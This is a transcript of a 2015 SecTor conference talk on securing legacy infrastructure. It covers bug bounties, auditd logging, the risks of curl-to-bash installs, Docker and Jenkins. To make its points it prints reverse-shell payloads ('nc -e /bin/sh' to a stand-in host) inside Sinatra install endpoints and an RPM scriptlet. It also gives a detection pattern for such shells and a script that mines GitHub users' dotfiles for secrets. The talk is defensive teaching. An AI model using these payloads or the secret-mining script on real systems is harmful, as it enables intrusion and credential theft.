Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security for non-Unicorns. SecTor 2015

Bea Hughes
October 20, 2015

Security for non-Unicorns. SecTor 2015

Security is becoming quite the thing nowadays, everyone wants to have some. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, whether you are established or if you're based in Silicon Valley and are about to write "the new hotness". However, what happens if your company is older than say, 6 months? You will already have some legacy systems and code. I'll be talking about how it's possible to unearth some of the security issues you may face, how to stop them happening, what happens when you do uncover them, and coping strategies for dealing with them.

Bea Hughes

October 20, 2015
Tweet

More Decks by Bea Hughes

Other Decks in Technology

Transcript

  1. Who's this clown? 2 » Infrastructure security at Etsy. »

    Recovered operations monkey at Puppet Labs. » Own a lot of black t-shirts. » Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for SecTor 2015 2
  2. Setlist » Intros. (you are here). » Few real world

    problems & applications. » Fixes, or at least coping mechanisms. » Panicked summary based on time. » Comments thinly masked as questions. @benjammingh for SecTor 2015 3
  3. From tiny seeds, do mighty acorns grow. » PinkiePwn's 6

    tiny bugs in Chrome to full sandbox escape. » Egor Homakov's 5 small bugs in Github to full private access on GitHub. » XSS to remote code execution in under an hour. » Username & password from HVAC system leads to $160+ Million Target breach. @benjammingh for SecTor 2015 7
  4. Computerising is hard. No. 1 takeaway for security types is

    a sense of perspective. (maybe even humility! gasp) @benjammingh for SecTor 2015 9
  5. Security people aren't great secure coders. » Snort: 10 CVEs,

    Wireshark: 322! CVEs » Security Firm Bit9 Hacked, Used to Spread Malware » Joxean Koret on Breaking Antivurius software » Tavis from Project Zero on exploiting ESET » BEST! FireEye just running Apache/PHP as root ! @benjammingh for SecTor 2015 10
  6. So who do I trust? » No one? Always a

    great position for security people, who don't want to get paid. » Everyone? Do I have some emails with funny cats for you to click on. » Security vendors? If you have infinite money and no attackers. » Attackers! @benjammingh for SecTor 2015 11
  7. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for SecTor 2015 12
  8. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for SecTor 2015 15
  9. terrible bash example (don't do this) # for i in

    $(curl --silent 'https://api.github.com/orgs/<target>/members' \ # | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \ # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \ # git clone https://github.com/$i/dotfiles.git $i ) \ # ; done for i in * ; do [ -d "$i/.git" ] || continue cd $i for revision in $(git rev-list --all) ; do unset PAGER export GIT_PAGER="" # find . -iname \*.key -or -iname \*.pem out="$(git grep -i -E "$1" ${revision} )" if [ $? -eq 0 ] ; then echo "${out}" | LANG="C" sed "s/^/$i: /" fi done cd .. done @benjammingh for SecTor 2015 25
  10. Auditd Auditd is the best way to get command execution

    logged in your infrastructure. @benjammingh for SecTor 2015 28
  11. Auditd Auditd is the worst way to get this information

    to a log file. type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000.... typde=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl" type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax" type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 @benjammingh for SecTor 2015 29
  12. WHY? "Why are the logs multiline?" -- David Shing, aka

    "Shingy", aka "The Shing", aka "AOL's digital prophet" @benjammingh for SecTor 2015 31
  13. Coping with multiline auditd » ELK: multiline filter in Logstash.

    » Other: github/gdestuynder/Audisp-json » Have cash, want a decent GUI (and more): Go use Threatstack! » Write something yourself in python & golang: I keep promising to OSS this ): @benjammingh for SecTor 2015 33
  14. Alert on sketchy things. (assumes ELK) 1. Elastalert from Yelp

    2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. @benjammingh for SecTor 2015 34
  15. Sinatra example get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return

    'nc -e /bin/sh root.legit.pw 2222 &' else return print_install_code() end end @benjammingh for SecTor 2015 38
  16. Sinatra example 2: Payback get '/install.sh' do ip = request.env['HTTP_CLIENT_IP']

    if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end @benjammingh for SecTor 2015 39
  17. curl | bash "But this is no worse than packages."

    foo$ sudo yum install sketchy foo$ sudo aptitude install sketchy @benjammingh for SecTor 2015 42
  18. curl | bash "but worse than downloading RPMs from a

    random site?" foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm foo$ dpkg-sig --verify sketchy.1.33-7.deb @benjammingh for SecTor 2015 43
  19. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for SecTor 2015 44
  20. Verifiable This doesn't exist: foo$ curl legit.pw/sketch.sh | sudo sh

    --gpg-verify No one has ever done this: foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh @benjammingh for SecTor 2015 45
  21. curl | bash "But I trust HTTPS" » HTTPS certs

    cost ~$6. » If I can't make $6 by owning a system, I should probably stop being an attacker. » @letsencrypt will soon make this free. @benjammingh for SecTor 2015 46
  22. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for SecTor 2015 58
  23. But is Docker itself secure? » Don't run things as

    root. » No really, stop running things as root. » Did I mention not running things as root. » It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for SecTor 2015 62
  24. Securify the Docker. » Don't use --privileged. » Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. » Use Docker Notary » Use GRSecurity (just do that anyway, if you can.) » Use SELinux... I may as well ask for a pony here. @benjammingh for SecTor 2015 63
  25. Threat modelling for beginners 1. what are you actually defending

    against? 2. from whom? 3. for how much? @benjammingh for SecTor 2015 67
  26. <pinch of salt goes here> » I am not saying

    Docker is ZOMG unhackable. » it's just cgroups and namespacing. (just) » Escapes will happen. » They have a rad security team (Hi @diogomonica and @nathanmccauley) @benjammingh for SecTor 2015 69
  27. unpinchofsaltd » You can use it in a way that

    is secure, enough. » network separation & segregation still works. » secrets/credentials still a bigger problem. » PLEASE don't just adopt it because it's new & shiny. » ! " unikernels ✨ $ @benjammingh for SecTor 2015 70
  28. It's entire job is to take arbitrary code and run

    it, With access to some secret/credential @benjammingh for SecTor 2015 72
  29. RCE as a service 6 6 Hacking Jenkins Servers With

    No Password @benjammingh for SecTor 2015 76
  30. Make Jenkins suck fewer * Disable execution on the master

    Jenkins host. * Disable anonymous access. * (Use travis, if you can) @benjammingh for SecTor 2015 77
  31. NOT STOLEN FROM NickG's old 2012 deck. 7 7 Thanks

    Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security @benjammingh for SecTor 2015 79
  32. Jenkins as a force for [security] good » Gauntlt "be

    mean to your code" » https://github.com/secure-pipeline » Even Adobe blog on secure software, zomg! @benjammingh for SecTor 2015 80
  33. Summary » Computers are apparently hard. » Security is clearly

    harder still, obv. » Actually trust and humans is hard. » The typing is the easy bit. (ish) @benjammingh for SecTor 2015 83
  34. More Summary » Complex systems lead to much more complex

    security problems. (see Oauth) » Annual pen-tests don't scale, bug bounties can help. » Attackers are mining any public info you have (GitHub, S3, pastebin?) » No really, go check all your S3 buckets... @benjammingh for SecTor 2015 84
  35. Will there be a summary of summaries? » I beg

    you to stop trusting curl. » Auditd is awful, but it can be fewer awful. » Jenkins, you probably have to have one. » but that can be okay, nay, even useful for security. @benjammingh for SecTor 2015 85
  36. A summary appeared, what happened next will shock you »

    Docker and security can be used in the same sentence. » Understand your threat model (Apple's guide) » Don't be a FireEye, stop running things as root. @benjammingh for SecTor 2015 86
  37. Thank you » Twidder: @benjammingh » LinkedIn: lnkdin.me/p/benyeah » FidoNet:

    2:254/524.13 » JitHub: github.com/barn » SpeakerDeck: speakerdeck.com/barnbarn » Etsy: Careers <--- CodeAsCraft <--- our blog @benjammingh for SecTor 2015 87